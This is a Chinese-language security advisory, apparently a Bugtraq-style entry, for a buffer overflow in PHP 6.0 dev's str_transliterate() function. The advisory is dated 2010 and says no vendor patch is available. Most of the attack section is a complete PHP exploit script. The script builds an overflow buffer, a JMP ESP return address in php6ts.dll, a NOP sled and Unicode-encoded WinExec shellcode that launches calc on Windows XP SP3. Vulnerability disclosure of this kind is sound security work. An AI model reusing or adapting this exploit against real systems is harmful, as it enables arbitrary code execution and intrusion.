发布日期:2010-04-04
更新日期:2010-04-07
受影响系统:
PHP PHP 6.0 dev
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 39185
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
远程攻击者可以通过向PHP的str_transliterate()函数提交超长的Unicode字符串请求触发缓冲区溢出,导致执行任意代码。成功利用这个漏洞要求配置中打开了unicode.semantics。
<*来源:Pr0T3cT10n (pr0t3ct10n@gmail.com)
链接:?p=302&lang=en
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
view sourceprint?<?php
error_reporting(0);
#####################################################################
## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
## Buffer Overflow
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Exploited by TheLeader, Debug
## SP. Thanks: HDM
#####################################################################
## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
## Take a look, 'unicode.semantics' has to be on!
## php.ini > unicode.semantics = on
#####################################################################
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("\u4141", 256);
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat("\u9090", 20);
# WinExec Calc XP SP3 HEB Unicode-encoded shellcode
$shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
# WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
# $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";
$exploit = $buff.$eip.$nops.$shellcode;
str_transliterate(0, $exploit, 0);
} else {
exit("Error! 'unicode.semantics' has be on!\r\n");
}
function ini_get_bool($a) {
$b = ini_get($a);
switch (strtolower($b)) {
case 'on':
case 'yes':
case 'true':
return 'assert.active' !== $a;
case 'stdout':
case 'stderr':
return 'display_errors' === $a;
default:
return (bool) (int) $b;
}
}
?>
建议:
--------------------------------------------------------------------------------
厂商补丁:
PHP
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: